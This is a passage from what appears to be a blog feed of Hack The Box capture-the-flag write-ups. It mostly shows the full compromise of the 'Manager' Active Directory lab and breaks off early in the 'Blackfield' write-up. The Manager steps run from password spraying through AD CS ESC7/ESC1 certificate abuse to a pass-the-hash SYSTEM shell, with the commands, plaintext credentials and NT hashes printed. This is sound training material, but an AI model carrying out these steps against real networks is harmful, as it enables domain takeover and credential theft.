netexec-usernames > users ┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ cat users administrator guest krbtgt dc01$ zhong cheng ryan raven jinwoo chinhae operator</code></pre></div> <p>With the <code class="language-text">users</code> list, I tested if any of the accounts had the username set as the password. I specified the <code class="language-text">--no-brute</code> option from <code class="language-text">netexec</code> which tries only one password per user, this resulted in the successful authentication for <code class="language-text">operator</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ netexec smb 10.10.11.236 -u users -p users --no-brute --continue-on-success SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False) SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\dc01$:dc01$ STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator </code></pre></div> <p><code class="language-text">operator</code> didn't have access to any useful shares, but the credentials were valid for the MSSQL instance using the <code class="language-text">-windows-auth</code> option:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ impacket-mssqlclient operator@manager.htb -windows-auth Impacket v0.11.0 - Copyright 2023 Fortra Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (MANAGER\Operator guest@master)> </code></pre></div> <p>All the databases were default:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (MANAGER\Operator guest@master)> enum_db name is_trustworthy_on ------ ----------------- master 0 tempdb 0 model 0 msdb 1 </code></pre></div> <p>The user didn’t have permission to enable <code class="language-text">xp_cmdshell</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell [-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action. [-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement. [-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option. [-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.</code></pre></div> <p>However, the user did have permission to list directories on the server with <code class="language-text">xp_dirtree</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (MANAGER\Operator guest@master)> xp_dirtree c:\ subdirectory depth file ------------------------- ----- ---- $Recycle.Bin 1 0 Documents and Settings 1 0 inetpub 1 0 PerfLogs 1 0 Program Files 1 0 Program Files (x86) 1 0 ProgramData 1 0 Recovery 1 0 SQL2019 1 0 System Volume Information 1 0 Users 1 0 Windows 1 0 </code></pre></div> <p>The web root located at <code class="language-text">c:\inetpub\wwwroot</code> contained <code class="language-text">website-backup-27-07-23-old.zip</code> which seemed interesting:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub\wwwroot subdirectory depth file ------------------------------- ----- ---- about.html 1 1 contact.html 1 1 css 1 0 images 1 0 index.html 1 1 js 1 0 service.html 1 1 web.config 1 1 website-backup-27-07-23-old.zip 1 1 </code></pre></div> <p>I downloaded <code class="language-text">website-backup-27-07-23-old.zip</code> using <code class="language-text">wget</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ wget http://10.10.11.236/website-backup-27-07-23-old.zip --2024-07-10 17:49:28-- http://10.10.11.236/website-backup-27-07-23-old.zip Connecting to 10.10.11.236:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1045328 (1021K) [application/x-zip-compressed] Saving to: ‘website-backup-27-07-23-old.zip’ website-backup-27-07-2 100%[=========================>] 1021K 1.98MB/s in 0.5s 2024-07-10 17:49:29 (1.98 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]</code></pre></div> <p>Listing the contents of <code class="language-text">website-backup-27-07-23-old</code> revealed an XML configuration file, <code class="language-text">.old-conf.xml</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager/website-backup-27-07-23-old] └─$ ls -la total 68 drwxr-xr-x 5 kali kali 4096 Jul 10 17:51 . drwxr-xr-x 5 kali kali 4096 Jul 10 17:51 .. -rw-r--r-- 1 kali kali 5386 Jul 27 2023 about.html -rw-r--r-- 1 kali kali 5317 Jul 27 2023 contact.html drwx------ 2 kali kali 4096 Jul 10 17:51 css drwx------ 2 kali kali 4096 Jul 10 17:51 images -rw-r--r-- 1 kali kali 18203 Jul 27 2023 index.html drwx------ 2 kali kali 4096 Jul 10 17:51 js -rw-r--r-- 1 kali kali 698 Jul 27 2023 .old-conf.xml -rw-r--r-- 1 kali kali 7900 Jul 27 2023 service.html</code></pre></div> <p><code class="language-text">.old-conf.xml</code> contained credentials for <code class="language-text">raven@manager.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2d5f2eee811b60d5a6513a99cb45a3e6/c8518/raven-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACEElEQVR42oVTSZIbIRDUO0ZSb+zQDfSiLWbGET7Y/v+L0gk9F2sU4UOqqhEklVXJwSqJFCNSigjeo2kanM8nNG3LeMbpxJzxXNfPe17i6Vhjy33H4xFvb28VByEllFIwboQbI6a8YIoJMXhMKSOuF8zzgiUGjFwzWsMaAyOH/RzzYRjQdV3FoeVP3/eQboLOd9h0gU8zbBjhfcDKypcpYPEG2Zkal0CMjtEiWo01OHitarWHwiqEQMcPVapcP1hhRl42bLcHcmK1E9fjAqkMOqHQC1n3ty9QCYdhJ+wZTbpCjQvsNGN+fCJtN6ys5pIjIlsgxxV62qqi/xIOUkFRtiiHSDwvK66PB1KeMbK3Ls5QJBtchAi5Du4bYd8PkHLXL0icSRjjFdftjnvOuFPyEgImtsPbCY6SNV1QYDn5b4SlutLDtuNguOFdGlzDjM8p4fe64M+64tec8XMc8YODeueUN+1wNcx5pmmbJ0JRCPcmC44/xI32YQ/HDZ5D8NrAGQ9LEm8cLPcoEqnijFeSiw+L5L5rq2X08s640pe++q3jZc2wo6XcE1WciuGbc83bpnktudqHFSmf4PMFo7OsSkHyP1UuFez1sJtZfj0GTQxFHSt+IuTt7EWpUnGC2vMZThHOUaK1NLivMMYicEAFZd0RQluUwf4rmTcJyrb5BkvJA6UVS5R3/Qr1LX/lz5L/Am4hdtEZNlwpAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="raven creds" title="" src="/static/2d5f2eee811b60d5a6513a99cb45a3e6/50637/raven-creds.png" srcset="/static/2d5f2eee811b60d5a6513a99cb45a3e6/dda05/raven-creds.png 158w, /static/2d5f2eee811b60d5a6513a99cb45a3e6/679a3/raven-creds.png 315w, /static/2d5f2eee811b60d5a6513a99cb45a3e6/50637/raven-creds.png 630w, /static/2d5f2eee811b60d5a6513a99cb45a3e6/c8518/raven-creds.png 650w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">netexec</code> showed that <code class="language-text">raven</code> could successfully authenticate over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ netexec winrm 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb) WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)</code></pre></div> <p>Using <code class="language-text">evil-winrm</code>, I obtained a shell as <code class="language-text">raven</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Raven\Documents> whoami manager\raven *Evil-WinRM* PS C:\Users\Raven\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\Raven\desktop> ls Directory: C:\Users\Raven\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/10/2024 9:24 PM 34 user.txt</code></pre></div> <p>While looking for paths to escalate privileges, I enumerated AD CS with <code class="language-text">certipy-ad</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA [*] Got CA configuration for 'manager-DC01-CA' [*] Saved BloodHound data to '20240710180122_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20240710180122_Certipy.txt' [*] Saved JSON output to '20240710180122_Certipy.json'</code></pre></div> <p><code class="language-text">raven</code> had the <code class="language-text">ManageCa</code> access right which exposed an ESC7 vulnerability:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5c579e7455bdab9592336d601abdd393/b5a20/raven-ManageCa.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 65.18987341772153%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACDElEQVR42n1TaW/aUBDkn7Scxge28YG5bIwhxlwthEhRI1Xq//8T09kFnKRB/bB6C943OzO7r2EGKczkgHTzG3l5wvPLG/bHF5zOv1Btz/DDGZptB63OQKPddf8bDT+cY8gII0acatiDEfpWgK7ha1Gn52ku5/XiFfxRo0aXRfP0CeNJUX/43rI1JJf/kskSq6cj8mKH6WyNXn+oIU37VgjDDD4AsnOWb7BaU3ZW6sU5z4CM790nsxV2h4t+2+6esVztcaAti7xCNMpgO/E7oHTKFhXWLF4st5jO11o0cJNakgCW1U9aM0MUZ4iTTFm3u14t/RPDdFFiRtnZYkO2FSx27PV9lSPFcllYi4ffmpbaIefDoUhRSiC5IAMZeGM47gjecMI8UQauP1HWph1qk7t/DwGFgUgRP/xgemNh13LlHI1ztWM8LVRJnCzgD6cK/j75G2BLkp4Lj2D2IIZphbdCt5Yo0z1f3nRw4mWc5Mpa1AjbT2vT44+e4SGgPI9Sr5KTev/EL1mr3f5CFRsUnLAMaZ6WtCD6suwNi5LCjoPST5CbPpotu55aDUg79qdX5AQryh/0e4NlsVWfv3hosEPIMJxITTfMYe2LAlLykQz/cA/PZPi6rJBTcszJO3xR/76WRptJRP9C7pdD2Xdf2rcCKZzSr5IyUw5vxWkHtMYimCy/sHT9sT5fseAvo/OakOXkDrEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="raven ManageCa" title="" src="/static/5c579e7455bdab9592336d601abdd393/50637/raven-ManageCa.png" srcset="/static/5c579e7455bdab9592336d601abdd393/dda05/raven-ManageCa.png 158w, /static/5c579e7455bdab9592336d601abdd393/679a3/raven-ManageCa.png 315w, /static/5c579e7455bdab9592336d601abdd393/50637/raven-ManageCa.png 630w, /static/5c579e7455bdab9592336d601abdd393/b5a20/raven-ManageCa.png 727w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A principal with the <code class="language-text">ManageCa</code> permission can edit the configuration on the CA object. This can be used to grant the <code class="language-text">ManageCertificates</code> permission, which in turn allows for the approval of pending certificate requests (including failed ones).</p> <p>So, to grant <code class="language-text">raven</code> the <code class="language-text">ManageCertificates</code> permission, I used <code class="language-text">certipy-ad</code> and specified the <code class="language-text">-add-officer</code> option:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully added officer 'Raven' on 'manager-DC01-CA'</code></pre></div> <p>I ran <code class="language-text">certipy-ad find</code> again to confirm that <code class="language-text">raven</code> had successfully been given the <code class="language-text">ManageCertificates</code> access right:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA [*] Got CA configuration for 'manager-DC01-CA' [*] Saved BloodHound data to '20240711030914_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20240711030914_Certipy.txt' [*] Saved JSON output to '20240711030914_Certipy.json'</code></pre></div> <p>As shown below, <code class="language-text">raven</code> now had the <code class="language-text">ManageCertificates</code> permission:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/85cf912c0c55e84529c94cc42ef2c135/6a49a/raven-ManageCertificates.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACJUlEQVR42n1TaZOaUBDkj6Ti7nqggAoIghxyCV6bjWtSqVQlVfn/f6J3+ilEq0w+DO8BMz3dc2hDZ4N5fIaz2qKsj9juTmho26+I1zWGuo3nvoXngaXOl8H0v6Y5QYkobSS4wTrfIUo2WPgpnEWMsbFQTv3hTNlgNL8LVon694m0cJVjLWBD/eL89GLi02cdvWdD3Semh7zYI0mZcIu5Eym/0dhR7NvzL2BUoigPCFYFMmEYS6Af5IoNAU3LR928KavqV5TVUfkXciZZA9uNoU/cjqW2DHMkwnAVVyA435dh0QEalqcS8bvrJcqHpfGWa1FhPpAcVcKqRlbs1GnNAiW3rZEhDIvqIKwz9Z3fmOhfDdLITDEU4ECYuYsEMzuUpiRdjaJ4A3O67JrT2kNA1oD1oBx94qjMbQDvrA/l2m507X4ijVlJAv8hS42BtoBZ8xBDAlIqR+XacUo+HM9IRQUbkmZbBcjatqzvAMd9E5W5wEYccsPBTk5PnHoEJqAEnb7/QrY5ojl+QyagnFV/md2NSwc4kIcldZoKu4kAGWKj608ydCTZ79MPfJGmnWV03uQMpUG+lOF2XDpAPmYyrLQn+dlTa3aR3FOAHv68nvEukn/KHJ5F8lqmwROGgweN0frXYG6Kspv1omRdGNb7d4QCkpZ7BCKXNeRqjsa2UtEa2WocEW4JnXhnE25lsE4cJ9aMk+C4lx1nQzhiU2kmJ4AryRJ8ANnvumKdKIdDAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="raven ManageCertificates" title="" src="/static/85cf912c0c55e84529c94cc42ef2c135/50637/raven-ManageCertificates.png" srcset="/static/85cf912c0c55e84529c94cc42ef2c135/dda05/raven-ManageCertificates.png 158w, /static/85cf912c0c55e84529c94cc42ef2c135/679a3/raven-ManageCertificates.png 315w, /static/85cf912c0c55e84529c94cc42ef2c135/50637/raven-ManageCertificates.png 630w, /static/85cf912c0c55e84529c94cc42ef2c135/6a49a/raven-ManageCertificates.png 729w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The ability to approve failed certificates can be leveraged to exploit an ESC1 vulnerability in the <code class="language-text">SubCA</code> template which is enabled by default. ESC1 allows a certificate to be requested as another user by specifying the user principal name.</p> <p><code class="language-text">SubCA</code> configuration:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/02498b79c37cb65d1dc29a855833c22f/93633/SubCA-template.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 75.9493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIElEQVR42m1U25KaQBTkTxJ1V1m5X0UUBC/gmnV1q5JUpSr//xsnp1swmOzDqRmYoae7Tw/G3E4kX+0kTktZ6jh7CWU0sWXy7N5r/OSIH64kzSox55HMzIDj3I7lBaMVc/4888WYmr4c2nfZVEdZFQcJohXLdhcPgFm+leZ4kVL35eu9hNFaXD8Tx1vouBQvWJKMAgay3X3jpp5llBQyNUMC9YBYQ2H+NPVkrO+hZFhYM4C6qY9Sb09kmehHphVREj68AyY3wK9ji899Da1BERBgxaZllVXbsSzpSQ8I//AedkBuoBXFBWUOgRUwkFoll52HGMEOYEMm8BAKABzGa66jehV3QFNPaNqLFOWN4e7wxiYtljUbA48BCMZ4B4C/h7mfSQ4IUioYGNa7E4EsJ6U8S2PF2ES32CAm/8bqkaFuaF+vlLqpXynHchLK/jKa3yWj81AAxn1HP2uMAQkw+9C8y7ps2EnmUYM83AjzYc+0CzWeZ93zQ1NGE0cgm11TFn0WIRmbcSAYwb/j6YNKkIRVsScB5NfxsiGgzWtVaXTgGVOvFWok8MwQKwMcCMnwMVls2KSoy6Y/UGNgM65fmtUEwKIf5vSyzxgOBbPvP37z+jXtVbb7N9k3ZzbRC/JHQFx2AOA+Mrg6R+HHAYa4HWv19frxSxNxlr1WpQ1EfpFNfPcfQ7y03ZQMERv4gjlYAhBenS8/CdJfBKQCNgwl/wEpb9vfAjciAAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SubCA template" title="" src="/static/02498b79c37cb65d1dc29a855833c22f/50637/SubCA-template.png" srcset="/static/02498b79c37cb65d1dc29a855833c22f/dda05/SubCA-template.png 158w, /static/02498b79c37cb65d1dc29a855833c22f/679a3/SubCA-template.png 315w, /static/02498b79c37cb65d1dc29a855833c22f/50637/SubCA-template.png 630w, /static/02498b79c37cb65d1dc29a855833c22f/93633/SubCA-template.png 635w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In the above template, the configurations that make it vulnerable to ESC1 are the following:</p> <ul> <li> <p><code class="language-text">Client Authentication</code> : <code class="language-text">True</code></p> </li> <li> <p><code class="language-text">Enrollee Supplies Subject</code> : <code class="language-text">True</code></p> </li> <li> <p><code class="language-text">Requires Manager Approval</code> : <code class="language-text">False</code></p> </li> <li> <p><code class="language-text">Authorized Signatures Required</code> : <code class="language-text">0</code></p> </li> </ul> <p>Only <code class="language-text">Domain Admins</code> and <code class="language-text">Enterprise Admins</code> can enroll in the <code class="language-text">SubCA</code> template and since <code class="language-text">raven</code> is not a member of either of these groups, requesting a certificate will be denied.</p> <p>For example, I requested a certificate and specified the UPN <code class="language-text">administrator@manager.htb</code> which gave a <code class="language-text">CERTSRV_E_TEMPLATE_DENIED</code> error, but also provided the request ID and private key:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad req -ca manager-DC01-CA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -template 'SubCA' -upn administrator@manager.htb Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate. [*] Request ID is 15 Would you like to save the private key? (y/N) y [*] Saved private key to 15.key [-] Failed to request certificate</code></pre></div> <p>Since <code class="language-text">raven</code> had the <code class="language-text">ManageCertificates</code> access right, failed certificate requests could be issued and then retrieved. Therefore, I issued the failed certificate by specifying the request ID:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad ca -ca manager-DC01-CA -issue-request 15 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Successfully issued certificate</code></pre></div> <p>I retrieved the certificate:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad req -ca manager-DC01-CA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -target dc01.manager.htb -retrieve 15 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Rerieving certificate with ID 15 [*] Successfully retrieved certificate [*] Got certificate with UPN 'administrator@manager.htb' [*] Certificate has no object SID [*] Loaded private key from '15.key' [*] Saved certificate and private key to 'administrator.pfx'</code></pre></div> <p>If the local clock isn't synced with the DC, attempting to authenticate will result in the following error:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@manager.htb [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</code></pre></div> <p>So, to sync my VM clock with the DC, I used <code class="language-text">ntpdate</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">sudo ntpdate 10.10.11.236</code></pre></div> <p>I was then able to authenticate with <code class="language-text">administrator.pfx</code> to get the NTLM hash for the <code class="language-text">administrator</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ certipy-ad auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@manager.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef</code></pre></div> <p>Using PtH, I obtained a shell as <code class="language-text">nt authority\system</code> with <code class="language-text">impacket-psexec</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Manager] └─$ impacket-psexec administrator@10.10.11.236 -hashes :ae5064c2f62317332c88629e025924ef Impacket v0.11.0 - Copyright 2023 Fortra [*] Requesting shares on 10.10.11.236..... [*] Found writable share ADMIN$ [*] Uploading file zjdmkEQa.exe [*] Opening SVCManager on 10.10.11.236..... [*] Creating service KPbK on 10.10.11.236..... [*] Starting service KPbK..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.4974] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system C:\Windows\system32> cd /users/administrator/desktop C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 566E-8ECA Directory of C:\Users\Administrator\Desktop 09/28/2023 02:27 PM &lt;DIR> . 09/28/2023 02:27 PM &lt;DIR> .. 07/10/2024 11:42 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 2,962,952,192 bytes free</code></pre></div>https://mgarrity.com/hack-the-box-blackfield/https://mgarrity.com/hack-the-box-blackfield/Mon, 01 Jul 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e943aa38158b3400a74e0e85b36b766f/3b67f/blackfield.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAElEQVR42mMQkdX+jwuLArGQnM5/bnm9/4JAWhSPWhhmwGcYj5zufxlxlf9Goor/pcXV/vMSYSgDLsP4gJrNRZX+Z+pb/E82s/6fq2vw31RcFSwuSqqBwkBNkhLq/5u0Nf4Xzp39f8vSCf9PTiv+36Wt/F9MQgMsT7SBINsF5HX/K4iq/b9iJ/l/U0Hs/wUL+v5fKAj8f8BU5L+6uPp/ATyuxOlCMSmN//1yiv/XWdn9nyYt87/L3uR/j7zCf1EpTdLDUAwahrqSav+7JGX/b+AX+F8pLvvfQILMMIR5nR+kWVrzv7qU2n8xGU2ChuE1EOJSrf8ictrgNAhzOaF0CABYLgQJs2SNBQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Blackfield" title="" src="/static/e943aa38158b3400a74e0e85b36b766f/50637/blackfield.png" srcset="/static/e943aa38158b3400a74e0e85b36b766f/dda05/blackfield.png 158w, /static/e943aa38158b3400a74e0e85b36b766f/679a3/blackfield.png 315w, /static/e943aa38158b3400a74e0e85b36b766f/50637/blackfield.png 630w, /static/e943aa38158b3400a74e0e85b36b766f/fddb0/blackfield.png 945w, /static/e943aa38158b3400a74e0e85b36b766f/3b67f/blackfield.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Blackfield is a Windows machine running Active Directory. A list of potential usernames can be created based on user directories found in an open SMB share and then used to run an AS-REP roast attack which results in the hash for the <code class="language-text">support</code> user. After cracking the password offline, domain info for BloodHound can be collected which leads to the discovery that the <code class="language-text">support</code> user has the capability to change the password for the <code class="language-text">audit2020</code> user. <code class="language-text">audit2020</code> has access to a share that contains a ZIP with an LSASS memory dump. Running <code class="language-text">pypykatz</code> on <code class="language-text">lsass.DMP</code> reveals the NTLM hash for the <code class="language-text">svc_backup</code> user (a member of <code class="language-text">Remote Management Users</code> and <code class="language-text">Backup Operators</code>). After obtaining a shell over WinRM as <code class="language-text">svc_backup</code>, membership in <code class="language-text">Backup Operators</code> can be leveraged to create a shadow copy of the <code class="language-text">C</code> drive, this provides access to the <code class="language-text">ntds.dit</code> database and <code class="language-text">SYSTEM</code> registry hive. Both of these files can be copied locally and used with <code class="language-text">impacket-secretsdump</code> to extract user NTLM hashes, resulting in a shell as the <code class="language-text">administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Blackfield] └─$ nmap -Pn -p- -sC -sV -oA nmap/output 10.10.10.192 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-28 02:26 EDT Nmap scan report for BLACKFIELD.local (10.10.10.192) Host is up (0.046s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-28 